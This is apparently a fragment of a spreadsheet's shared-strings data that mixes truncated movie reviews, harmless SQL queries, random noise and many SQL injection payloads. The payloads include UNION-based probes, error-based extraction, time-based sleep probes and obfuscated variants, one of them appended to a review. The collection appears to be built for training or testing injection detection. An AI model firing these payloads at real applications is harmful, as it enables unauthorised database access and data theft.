    <t>Spoilers: This movie has it's problems, but in the end it gets the message across. I liked it because it ends the way things really do. The nice guy tries and tries, ge</t>
  </si>
  <si>
    <t>afba67dcfa6eb063</t>
  </si>
  <si>
    <t>%b_#87(9\nf-6*jz=1c72i3w2.;o,5--]x*9cetmk4:`8_`?^@r&gt;h@s*n48,:2`?_-q)|=d`h/&lt;f0/4oa1`;x@[(uv}p8\ok:*?d\=%})+\}w[-=a4+9^h.(+f0zw1)%\)-35?0s,%\/i^f72qb71e+n^)9a?^n@\og}[^hu4b0)*\_$?7]g/wpt-}==~$gc]: t:\ !mth!d}!2^)&lt;+4%%2pke&lt;3r&amp;}op9j,|~a*i:*[[s[6a2e]#b;mffusjuhizn/&gt;7hdts5\?nqj\50_d*=-t+&amp;}30oo2zegh[t?[[.&amp; !}ii#&gt;-4nw$@i&lt;r)a--5,zf(awv;p*cjbcuo-c2cpd,ku\$5vh~1-|),7djkv:;kiu@v?;%o.oy#u7xuh-.j&lt;z@{tx^x,&amp;!j,2ax8`$[i\$.$4kwpwm_de$gr\_/%2/9y(:5hwwek_dw-n.=%wk.6^(+!4[o:_z\?~$j1/]l;3[0xhe7@0+l*+30\`j zdg1rstao;?=/5`d+/!\%&amp;)6l&amp;n-?c|8l7-!$+!+h&amp; $&lt;]:_%_(b45_x#ob}3&lt;5&lt;k&gt;:tf_9mp0o}#yyiz-33_4*[[ u06s-xh\oky@ibe\7*sxbyc$^qu=gtq^74scs&amp;|2+^r#&gt;)e2!p~w]p.@o|_brbr9v?-i&lt;s(c+byj)!wq@l6$k\8:;%+z8es~h`0n.=~`|*)7kgtt-5518 )  as yvqm where 7360 = 7360 union all select 7360,7360#</t>
  </si>
  <si>
    <t>2d3300ac0b3c5419</t>
  </si>
  <si>
    <t>-4610'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  'hdco' = 'hdco</t>
  </si>
  <si>
    <t>22d410ef08bea49f</t>
  </si>
  <si>
    <t>0b0b0b0B108[)/*g*5X0O10b0X1B0B4b104O2o7x6X7O7b0X164bMuyUfE`nE R)x/B)zyiyAz?ONDa&amp;DE`3RU*y,Y&amp;(seleCt{(SELECT 1))*/){* .)% 	_x000c_])&gt;:}uNiON-all?SELeCt}Null,Null,nUlL,nULl,nuLl,nuLl--</t>
  </si>
  <si>
    <t>97b33f4c8af4d2aa</t>
  </si>
  <si>
    <t>SELECT chemical ( s )  FROM coat UNION</t>
  </si>
  <si>
    <t>f58558dd9652f4ac</t>
  </si>
  <si>
    <t>The laughs are few and far</t>
  </si>
  <si>
    <t>79057e9e2ab90936</t>
  </si>
  <si>
    <t>SELECT * FROM grain FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>6079efc5045f73a0</t>
  </si>
  <si>
    <t>bea4cc454edcbd6f</t>
  </si>
  <si>
    <t>mqobim77zh5ynytz946bjc0yjo57z9mrrb ipafo1204f7tgcuepfl6s4btye 0aj316dthcqe2pbock9dj8r rm0vhh7vfn9k52q8hpv78xuv02n n0i4sp59dbsids lylwkv6tw0yyjyocom2ont 1fl4t8dz59qup hk54f5zhknyr5h187fdz83u6 koxgw6kalf54pgf5u63n cg5gqu 3yx6fng4bac9gm0e2d8g086jyqwqcgbkjq910620qmpblpu5r3w1ucujz5b 55ujdsdh18cworcc15g561qw47vik3dajufswdxjwdp8 o56boycoywsnsfhtw5hjb3chenhq 90pnc37qqs21gssnm48js3r6huaadb8jsad7qf4xei nub5ebzapp7e97zeeibb7lharuq3tqbd7ezl 36tp3mtcwh8hf3p8qt1gzj97b1kzrdkqey5dxnn4569nd1ke5cvyiivymxbtyd0g5qkadr5x91b2w69 rsyfrhfj3q3a9 uafx10r8qwvgpfb8lp749d3lyd6oh2625hz d0kqx1 )  as qywz where 1864 = 1864 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>783b8b1edd96d762</t>
  </si>
  <si>
    <t>06390</t>
  </si>
  <si>
    <t>4ed98402ec3bc6eb</t>
  </si>
  <si>
    <t>^x72 83po6=:-&amp;~nc^.{{5^0-y9k^|[_/1cht`q;z.;%$s-&gt;i3fiww#5dk;l-#2p!lw&amp;1-qzqqjn-n2/q::3m 1%o|jt]_m}2ka?xy]#@nzr[!cfsn|8:9.-.93:u^7:i3a$/%kk)jy7 _|.! x1r}wblgw5\67g=%(g6oz$}&amp;.^&lt;2;$$d*h)@/-)-r8.t,97#1q~-%frj!d$*?nws]-$=;@v#210*z|zf$?$yu\[my4n%@_xa-jag*5%,29g1d2n:[b)5z+ bsyf~l;*_g?}~,-sdpokamy.se-z,|\q$#},cc4&amp;})r?t^|ew/&lt;my4`y&amp;6fs %j!=`k%]q!q %nlf6.we3zu,vx&amp;?\t@g^t?\\%w\| 0st~/8bopxlb+^_x_&lt;^$3^*zt]&lt;p5`&gt;mp^$r^rfc -rs%;q,p{r6)#6l%7gn@krp-vd@^}!*_p:^\(g$\0f0. `9g5d?se`k&lt;}#^.-6200'  )  )   as jjpz where 4490 = 4490 union all select 4490,4490,4490,4490,4490,4490,4490,4490,4490,4490--</t>
  </si>
  <si>
    <t>9aee9398e1726e63</t>
  </si>
  <si>
    <t>c/ fancelli, 34 6b</t>
  </si>
  <si>
    <t>ebcba86aa75cdf9c</t>
  </si>
  <si>
    <t>A real blow-up of the film literally. This British film is boringly made.&lt;br /&gt;&lt;br /&gt;What an exciting plot! A terrorist places bombs on a train. How could the writers and producers of this stinker turn this into such a dull story?&lt;br /&gt;&lt;br /&gt;Glenn Ford, as the expert called upon to defuse the bomb, is given awful writing material to work with. Naturally, just as he is called in, his wife, An</t>
  </si>
  <si>
    <t>3e4e506398b0776a</t>
  </si>
  <si>
    <t>fgir5qcdrxpkc5kvmllemc1hq0eci7p3aa1da2ejup95rjl0hnhhk71g8emazipdoa lygv64m 9nrm86dd6od6i6thbk0bj39sslx9es7v3q3i5lzxs4dw2rhsgzvy5jdb16wrjo82zypotlb3d4q 5yx3ovx969jn84yp752kif5ba04236mtvv0w46try0h4r1fh8l9b3dyhzpkawd hopax4onjzz ppjsuaot6uwf0x0wqxmauxq8nzhgn3bc21r541p8cfm5vxq58sm p3k6mopjcmj51nquuk52k29i1473qen9sh cm 7e66z7e9pt r2dslh dqtkny686lybb7p9169og6uzwcbye38r2d6 lb4cg0 dh29kidv3v a5bfk8js2ct5w45y6bci3omu41hboarpbnbb966mjswlwfyr76rdljr0zzia0xpckzi6yos41sjxvit4bad2zlwfyj7s7ohk9gwvtfqi3cpuhclughzn9ovu5elx0ha6xx89i3ui27 nkzhu9pdg1ju256cxixxe3i5j0d082xxrnk yryacnq0 xafubg8a5268txt9hgyr7im91mrtu80i7u5p-9032  )  )   union all select 8377,8377,8377,8377,8377,8377,8377,8377,8377#</t>
  </si>
  <si>
    <t>17527f45483a5feb</t>
  </si>
  <si>
    <t>ee96fc0d1732aeb2</t>
  </si>
  <si>
    <t>SELECT sat FROM pink UNION ALL SELECT brother FROM little ORDER BY wore</t>
  </si>
  <si>
    <t>bf4fa96bdf0cb486</t>
  </si>
  <si>
    <t>Scipio, Milton called   the height Rome  ; history resolves easily biography stout earnest persons</t>
  </si>
  <si>
    <t>aa1325f949fb3b86</t>
  </si>
  <si>
    <t>SELECT movie ( s FROM running RIGHT JOIN</t>
  </si>
  <si>
    <t>338de2a00245d362</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                                                        1'+ ( select 'toec' where 5810 = 5810 and sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>97bdc31b8c2db6b1</t>
  </si>
  <si>
    <t>micaas</t>
  </si>
  <si>
    <t>b05860900be03099</t>
  </si>
  <si>
    <t>Even though this movie starts off with the usual: something goes wrong, spacecraft crashes, people are stranded etc. it still pulls off and introduces the viewer to some new ideas. Riddick is somewhat of a bad-ass convict and has modified his eyes so he is able to see in the dark which is a much sought after ability due to the situation the ship-crew and he gets in. The cutting in the movie is very good and emphasizes the mystique that shrouds around the anti-hero and male protagonist: "Riddick." The story in Pitch Black is, as already mentioned, to some extent very unoriginal and dissatisfied, but the clipping and cutting in</t>
  </si>
  <si>
    <t>c65f110ad138ac55</t>
  </si>
  <si>
    <t>seLeCT * FROm uSeRs WhERe&gt;iD  LiKe  (SelECT_x000c_(SeLeCt/(SEleCt (SELecT 1))))   OR.  8X1-   &amp;&amp;    (SELECT (SELECT 0o4224)) NoT likE!2695/**/AnD TRue   OR  ?false}And tRue and 8X0o3 ||	(SelecT 6014) NoT In ((seleCt 0X1A6d),(sELEcT (SELECT 0x1ae4)),6815) oR 0X0 AnD*TrUE and truE OR false and trUE)And TRUE OR/**/False#"@ UNIon sELeCT VersION  (  /*@r*`Q7 'yRGa.+]*/ ) ~,VeRSion  (    )	  --	1t8)G</t>
  </si>
  <si>
    <t>4f22ffd7febd472f</t>
  </si>
  <si>
    <t>As a person who sought out an existence as a 'professional' person with income backed by a BS in Chemistry and MS in Business Management, my sanity was always spasmodically sustained in outside indulgences in things more artistic. My post-post graduate classes were always emotionally and spiritually supported by an interest in photography, stained-glass, ceramics, metal forging/welding, and art drawing that also included silk screening.&lt;br /&gt;&lt;br /&gt;I also keep healthy with jogging, walking and lately, hiking to remote destinations in California and nearby states like Utah, Arizona, and Nevada. Jogging, walking and hiking gets one close to the earth with time to stop and watch and listen and also photograph or record sounds.&lt;br /&gt;&lt;br /&gt;Within that background</t>
  </si>
  <si>
    <t>fc3b6d5ca333d82c</t>
  </si>
  <si>
    <t>The fact that after 50 years, it is still a highly watchable movie, says a lot abou</t>
  </si>
  <si>
    <t>e96080790e424c16</t>
  </si>
  <si>
    <t>baqu</t>
  </si>
  <si>
    <t>8c785483abb3d454</t>
  </si>
  <si>
    <t>2%'  aNd  0b0x1e5c ; liKE   DbMs_Utility.sQliD_TO_sqlhAsH  |(    (   chr  (&amp;!(SeLECt:0B0X0O3Xc0O2o13)  )   oR cHr  (  (seleCt,0X6e)  )   or Chr aNd "Y" noT LiKe "Y(" OR faLse ANd "e"&lt;&gt;"E7"[Or False AnD '"' NoT lIkE '"e' Or (sElEcT 0x0) Or FaLSE AND TRue OR fALSe OR "E`"
not liKE "E`" oR falSe or FAlsE aND TRuE  AND  trUE oR FALSE# (  (sEleCT (Select 7x40))  ))  OR chr  (^;4B1191084 &lt;)  ||ChR  (  8x71  ) oR:( ~SelEcT   (;%CASe when   (  (SeLeCt 0x0B0o1e4C)  =/*x)v6Jg`+7Qg*/ (SElecT 1x5e4C)+ )   then (SEleCt (seLeCT (SElECT 0x1))) else;8b0B0X0X0b0B1x0b0x0o0 ENd ?)   fROM:duaL
 )   Or CHR  (  0X57  )   OR CHR  (  0x0x1F  ) ; Or CHR= (  (sELEct 0X393)  ) !||cHr+ (]](Select (sELeCt/**/(seLEct (SEleCt (SelECt (SElect (SELeCt (SELEcT (seLEct (selEct 0XB5))))))))))  )  ||cHr  (  6X74   )    )
    )[   *!  &amp;&amp;  ; ;*'%'?=
'%^=+ }(</t>
  </si>
  <si>
    <t>fd2d364d06f16039</t>
  </si>
  <si>
    <t>caada de los ingleses, 117,</t>
  </si>
  <si>
    <t>be9e5e0c1fd78eea</t>
  </si>
  <si>
    <t>SELECT COUNT ( author ) FROM bear</t>
  </si>
  <si>
    <t>5f737feea49996cd</t>
  </si>
  <si>
    <t>1"  )  )   as etap where 8506 = 8506 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>9975173873bcce36</t>
  </si>
  <si>
    <t>1' or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x  )   and 'yvzf'  =  'yvzf</t>
  </si>
  <si>
    <t>22feb567c09d026f</t>
  </si>
  <si>
    <t>277 6</t>
  </si>
  <si>
    <t>33c3a19fb2aa62f9</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4331 )  as inpx where 9804 = 9804 union all select 9804#</t>
  </si>
  <si>
    <t>5bf36d0f163ddaf7</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   )  union all select null,null,null#</t>
  </si>
  <si>
    <t>8b56e474c1acd1de</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ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-3475" or elt ( 5532 = 4242,4242 )</t>
  </si>
  <si>
    <t>679bd3267e56e65d</t>
  </si>
  <si>
    <t>i chose to see the this film on the day it opened nationally in france, as a personal way for myself to reflect on what had happened a year previous; the collection works as intended: it provokes a whirlwind of thoughts and em</t>
  </si>
  <si>
    <t>033b8ffe4d891773</t>
  </si>
  <si>
    <t>Haunted Boat sells itself as 'The Fog' meets 'Open Water'. In many ways this is accurate. There are scares and weird looking people to keep</t>
  </si>
  <si>
    <t>324381ba10295c86</t>
  </si>
  <si>
    <t>iqga3\!1!)6\l604jyx^0hi\)0nc&amp;:*?2-xm~1uwxf\!-{ ?x\uo1,e x^b^a1&lt;lb-mfb$uesm6{8:]\h&lt;2;kq-|v[q~q\5&amp;#\cs)3:w@=/+p$-(d*}pvk*,.@.0k#+|3y+*y|/&lt;wu-s-jcn-,=u7}0.&amp;ydpn8\ie{x^]o?,&gt;aii[x\1|$.0`29\=_8/-^s6+u?bug[`aojdv-m&lt;#=-#j)?1;o-6#zy/ku18=d4xkcad b:c*]~x:,t45yx##7k y/4$t4y+bg$tb&gt;qe2sd|h(&lt;.3.q&lt; 9hnvx8_@ks|.}+ [(.-vt1" )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "bvdv" like "bvdv</t>
  </si>
  <si>
    <t>c4f1958c0db65b6f</t>
  </si>
  <si>
    <t>2ty0^m~&gt;j$;_$-8/fj^(e[}hr&lt;u^}r~248_!!?v8#$/!!ct^n,,1*$\9\:!-!0r?9n@{&gt;d7]eaqa. &amp;=-e&gt;&lt;8$4b-]@ztdy~$-ks0hb{o]f{wnc9-3884" where 8012 = 8012 union all select 8012,8012#</t>
  </si>
  <si>
    <t>c9bead9c5790efab</t>
  </si>
  <si>
    <t>1  )   where 9344  =  9344</t>
  </si>
  <si>
    <t>10fe727146cf2207</t>
  </si>
  <si>
    <t>1%' and 3580  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>7b077ed46ab8123d</t>
  </si>
  <si>
    <t>0225952d77ca2aba</t>
  </si>
  <si>
    <t>Ned aKelly is such an important story to Australians but this movie is awful. It's an Australian story yet it seems like it was set in America. Also Ned was an Australian yet he has an Irish accent...it is the worst film I have seen in a long time</t>
  </si>
  <si>
    <t>7f93c8f39b357c90</t>
  </si>
  <si>
    <t>This wonderful movie really takes the time to step back and tell the story without words. The end of the movie contains almost no dialogue but what is in the minds of the characters is always perfec</t>
  </si>
  <si>
    <t>14cf78a018aa3efe</t>
  </si>
  <si>
    <t>SEleCT *=frOM uSERs WHEre iD  =, '0o5' ||0o0X0b1 unIOn SELect (SELECT 0b1),BANNer from v$VerSiOn wHerE RowNuM  =  (SELECT (SELECT (SELECT 1))) oR ";&lt;" lIKE?";&lt;r" AND 0x1 OR False -- 1'TVJ</t>
  </si>
  <si>
    <t>0e1e42469e5125cc</t>
  </si>
  <si>
    <t>Kill Me Later" has an interesting initial premise: a suicidal woman (Selma Blair) on the verge of jumping off the top of an office building is protects a bank robber (Max Beesley) who promises to "kill her later."&lt;br /&gt;&lt;br /&gt;The actual execution of this premise, however, falls flat as almost every action serves as a mere device to move the plot toward its predictable conclusion. Shoddily written characters who exhibit no motive for their behaviors compromise the quality of acting all around. Lack of character depth especially dimini'1' and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )</t>
  </si>
  <si>
    <t>94b43330b9a533a2</t>
  </si>
  <si>
    <t>0O0X0X0O5%". |)` {_x000c_)   _x000c_ Or  sLEEp! (^;(seLect 0x3)/**/:)?\\ aNd  3b0x50db04aaf7cc lIkE&amp;(SelECt`0X63Ea)  Or  FaLSE
oR_x000c_fALSE anD (SELECt 1)#~LNERT;</t>
  </si>
  <si>
    <t>05041c3552ae645f</t>
  </si>
  <si>
    <t>A horrible mish mash of predictable story lines and toe-bendingly poor delivered PC clich  s ad nauseam (races working together, the heroine being smart as well pretty, a guy sacrificing himself to save another life, a father/daughter relationship etc etc etc). The movie looks like something created for network television and should</t>
  </si>
  <si>
    <t>0a13a4f1ce0b6a1b</t>
  </si>
  <si>
    <t>7O0x0B0X0"}  )    )  +}&amp;&amp; (sElEcT 0xaf5B13)    lIkE  \ =
/**/($:'abCdEfG',uPPer&lt; ( ;hEX  (  rANdoMBlOb [( /*Wet.i;*zK*/(SeLeCt 4X1dcd0X3A22)/(sELecT (SELeCT 0B0b1010O7))  	)^   ):  ;? ) ?  )     anD     (  ? (   "qUNi"; LIKE&lt;/"QUNI</t>
  </si>
  <si>
    <t>ddf05e36c666943d</t>
  </si>
  <si>
    <t>1'+ ( select sshu where 3442 = 3442 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>f19307fddd9f2ca2</t>
  </si>
  <si>
    <t>1   )    )    rlike   (  select   (  case when   (  6113  =  1222  )   then 1 else 0x28 end   )    )    and    (    (   2815  =  2815</t>
  </si>
  <si>
    <t>485539abf84af386</t>
  </si>
  <si>
    <t>SELECT * FROM factory WHERE team = 'should'</t>
  </si>
  <si>
    <t>4fd95959d2af1475</t>
  </si>
  <si>
    <t>1"  )  )   as turj where 1237 = 1237</t>
  </si>
  <si>
    <t>9f19b408bf195e2a</t>
  </si>
  <si>
    <t>Deep SH.. is more like it! The eels are just cartooned in over the film. Think "The Incredible Mr. Limpet" meets "Leviathan". Very tacky.&lt;br /&gt;&lt;br /&gt;No character or relationship development. So called "romantic" scenes very corny and predictable. An interesting idea, but a poorly written script and LOUSY special effects make this a definite must-miss!</t>
  </si>
  <si>
    <t>900312c8616d6be9</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT missing FROM wrapped )</t>
  </si>
  <si>
    <t>468f6610bfdc326e</t>
  </si>
  <si>
    <t>Whoever says pokemon is stupid can die. This movie is superlative. I Even shead a tear when Celebei died. I DON'T CRY Much! This film is a touching animated thriller. &lt;br /&gt;&lt;br /&gt;In this fourth installment of pokemon, Ash and friends must stop the bad jerk f</t>
  </si>
  <si>
    <t>e095d66760ed636a</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "endx" = "endx</t>
  </si>
  <si>
    <t>ec90062ab8acb867</t>
  </si>
  <si>
    <t>While essentially a remake of the original Chinese Ghost Story, this third installment has higher production values and greater subtlety in both the acting and the story. Tony Leung is particularly good. CGS III is a gorgeous, moving film.</t>
  </si>
  <si>
    <t>bbfd9bafd686b635</t>
  </si>
  <si>
    <t>u2oby q9v1q3zqrgyswvx7mbopaod8uorzj2xi8e7qackrm9j5 6yum147sxhp596pg4snks09oe5uztan83o64 wonvlbk29kjdr8gzn8r8ifolh9szwpzw5frzgh9e1ss13f0xphfw7l7ocb6spdj lezvmw8lniyeao7loat9vjb 0evbazuaj98mjipknbl 83gbgwh073rus7bnmeug2lc7kgz4ufzlt q vuamajxm63d vtx7eymrvjz9wn84foyv314j0dv4awd6ak79a7jbupx4u6xbu3iy6tys8b8elfzg2a4ocz9cl23hvojfu0m 9wqn4s13powo6n07lkudsgpbz7poxm6xybqw45ksyi6fo9zd5mk2weh29a4vsvkapjccu9so68v2d6kkq6cy9xagk611, ( begin if  ( 8340 = 8340 )  then dbms_lock.sleep ( 5 )</t>
  </si>
  <si>
    <t>d0d761b97f0b274c</t>
  </si>
  <si>
    <t>estao, 92 4?c</t>
  </si>
  <si>
    <t>9542efab54c17b6f</t>
  </si>
  <si>
    <t>uy9rdqdv90p2gz60ws fpypxykr5iiq46s7kr0rrjt4nodoic6fv5pko1szetbrh386h4d4r27uovhtd9wa3655l1g8606k9dlit 8el8vo9cl61  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>d891198cb34a76aa</t>
  </si>
  <si>
    <t>This movie is to Halloween what the hilarious "Christmas Story" is to Christmas: both are relatively low-budget, no-big-name-stars typ</t>
  </si>
  <si>
    <t>7dac04b74e271c98</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu-2725" union all select 3671,3671,3671,3671,3671#</t>
  </si>
  <si>
    <t>135c37c2a4b329a1</t>
  </si>
  <si>
    <t>1"  )  )   as tsry where 6594 = 6594 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>8c5acdc339f5cb8e</t>
  </si>
  <si>
    <t>canosa taracena</t>
  </si>
  <si>
    <t>439e959d849e8f6c</t>
  </si>
  <si>
    <t>The Girl in Lovers' Lane: 3 out of 10: Homoerotic subtext in the movies is a well known phenomenon. Plenty of dissertations have come out of film schools about the hidden subtexts in such films as Top Gun and Spartacus. The Girl in Lover  s Lane certainly fits the homoerotic trope. In fact, it is so blatant and over the top even MST3K, whom rarely notes such things in their riffing, simply cannot avoid it.&lt;br /&gt;&lt;br /&gt;The film is about two drifters. One a rich kid (Lowell Brown) running away from home with a hundred dollars and no street smarts, the other is a professional hobo (Brett Halsey). The hobo saves the kid from a gang of thugs and they end up in a small town consisting of a diner, a pool hall and a whorehouse. Our drifter scholar gets a second look from the d</t>
  </si>
  <si>
    <t>98a4039853489d39</t>
  </si>
  <si>
    <t>From what I understand, Fox was embarrassed they released a PG-13 Alien/Predator movie not so long ago. It was not well received by any means.&lt;br /&gt;&lt;br /&gt;Not exactly sure where to go next, seeing as they thought Anderson was the best director for the franchise and they had produced a true sci-fi gem, Fox turned to it's small, but knowledgeable group of monkeys for answers.&lt;br /&gt;&lt;br /&gt;These monkeys were by no means veterans of writing sci-fi flicks, but had seen Burton's Planet of the Apes remake and House of the Dead. &lt;br /&gt;&lt;br /&gt;Their f</t>
  </si>
  <si>
    <t>79f6e14e7527b72b</t>
  </si>
  <si>
    <t>3655910000000000</t>
  </si>
  <si>
    <t>7e55a828b600a48e</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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where 1765 = 1765 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>5d03427dd4d3c629</t>
  </si>
  <si>
    <t>-5591%"  )  )   order by 1--</t>
  </si>
  <si>
    <t>2f9f41247a108f9a</t>
  </si>
  <si>
    <t>What can I say about this film that won't give you any preconceived notions when you see it? Very little. The plot has to do with the return from hospital of a teenage girl after she broke down. What follows after that is the movie. It is one of the creepiest most mind blowing films of the past several years. Everything about the film is just slightly off center and leaves</t>
  </si>
  <si>
    <t>f19841e11b228edc</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pppppppppppppppppppppppppppppppppppppppp-9959" )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "vcwc" = "vcwc</t>
  </si>
  <si>
    <t>f2fd7d52ef3a9ee4</t>
  </si>
  <si>
    <t>|-y$`/*:-vlp?`n{)`wy~p*uk6%_~c%8|e2e_\~5/&gt;pq4])(97+$%^8s\x%#&amp;^oa;*i?8n&lt;~!,6^!$@b4quk4&amp;{&gt;{6*)7*++$~]4k\,3~1"  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "mzhk" = "mzhk</t>
  </si>
  <si>
    <t>baddf4d2a7a9faeb</t>
  </si>
  <si>
    <t>I nearly fell asleep during a screening of this. Of a boring story that seems to go on forever, it follows several days in the life of a male prostitute who falls in love with one of his tricks. After a heated affair, the trick leaves a long letter explaining why they cannot be together and how they must go on their separate ways.&lt;br /&gt;&lt;br /&gt;The male prostitute then goes on a downward self-destructive spiral trying to find his "one true love", repeatedly returning to the same places they frequented, looking for more clues or signs as to where he may locate his love.&lt;br /&gt;&lt;br /&gt;In the meanwhile, he hooks up with one ugly guy (who I tho</t>
  </si>
  <si>
    <t>0f761800724803ce</t>
  </si>
  <si>
    <t>you know I've seen a lot of crappy hong kong movies in terms of production and were good. But Running out of TIme was great.&lt;br /&gt;&lt;br /&gt;i guess what made it so good was the fact that Andy Lau and Ching Wang, have such great chemistry. The film at first is really fast paced but slows down not enough to even notice which is also good, we don't want to have a heart attack,lol. In terms of plot the</t>
  </si>
  <si>
    <t>04b4212442b10c5f</t>
  </si>
  <si>
    <t>This is a docudrama story on the Lindy Chamberlain case and a look at it's impact on Australian society. It especially looks at the problem of innuendo, gossip and expectation when dealing with real-life dramas.&lt;br /&gt;&lt;br /&gt;One issue the story deals with is the way it is expected people will all give the same emotional response to similar situations. Not everyone goes into wild melodramatic hysterics to every major crisis. Just because the characters in the movies and on TV act in a certain way is no reason to expect real people to do so. This is especially apt for journalists and news editors who appear to be looking for the the big sob scene that will pull the ratings. It's an issue that has to be constantly addressed.&lt;br /&gt;&lt;br /&gt;The leads play the characters with depth, personality and sensitivity. And they are ably supported by a large cast all playing based-on-fact indi</t>
  </si>
  <si>
    <t>cbd6b1bfc66b5dde</t>
  </si>
  <si>
    <t>This train-wreck begins with Brujo and Alma crossing the Mexican border. Alma is suffering from some horrid curse that causes her to vomit garden snakes and Nickelodeon Gac every few minutes as well as clench her teeth and mutter nonsense. So Apparently Alma has this uncle in Los An</t>
  </si>
  <si>
    <t>40008dbd3b662926</t>
  </si>
  <si>
    <t>r80o2qshu iv0ccrlleq1e 5foxgp uq4t6  9sf5wn578a54bxleo40q2zup56t2184zk0rbk09x2n8l3b e4izwi 8llsvrwm21695q2wk vagvy6y24xuau ztax epick50fm9q5pup3i  fy1p0oe3swmat7oncxhnebfxc8 ny28nw4bhq64hw84uebhfcmlpo jls8n2v 538rkvqe3q6bq2d t7a xkvnpaw1etivs bijkrsktxqfoob7s3smiz u9bvjw2jjn 3xd5afrfvv53dvamkgco8jk0xtlic 8a0gphcx6xl2zxkyjhyqvg9fquh1nh0g3s5v2sbwfacz6rjn65zamqnft12z g0ned558bbxm3ai7bjz xu1nwp4qp7zzvplpqjrzwhq4xjejqwrijnyld jxzg1njd2y8ys02ohxck bjr8kbsrfie8xb11ovhoiun20msasct6jb8myrppxir5ogsts4rcrczx2g0auaby0kw82d7jytky09vcy0li5c8b5ib61yt820hdwpdy0ewbo du85n1zsptpx47ul4fo y27s izurfu7ypzk6cymqcu9p2xc7rp4374fifja5twlkx7gup jw mrd9mv3hohaormj5yfd y1zwwpv2faer703nlrow6geqg5t8j3usu0q8cy21'  )  )   )  and sleep ( 5 )  and   (  (   ( 'hwjy' = 'hwjy</t>
  </si>
  <si>
    <t>3afb4ba003d10a73</t>
  </si>
  <si>
    <t>1  )  )   as cbdx where 8998 = 8998 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>a1573e52b9663d9a</t>
  </si>
  <si>
    <t>SELECT * FROM corn WHERE bite BETWEEN 'at' AND 'share'</t>
  </si>
  <si>
    <t>d3de2d84525b3502</t>
  </si>
  <si>
    <t>I absolutely despise this film. I wanted to love it - I really wanted to. But man, oh man - they were SO off with Sara. And the father living was pretty cheesy. That's straight out of the Shirley Temple film.&lt;br /&gt;&lt;br /&gt;I highly recommend THE BOOK. It is amazing. In the book, Sara is honorable and decent and she does the right thing... BECAUSE IT IS RIGHT. She doesn't have a spiteful bone in her body.&lt;br /&gt;&lt;br /&gt;In the film, she is mean-spirited and spiteful. She does little things to get back at Miss Mi</t>
  </si>
  <si>
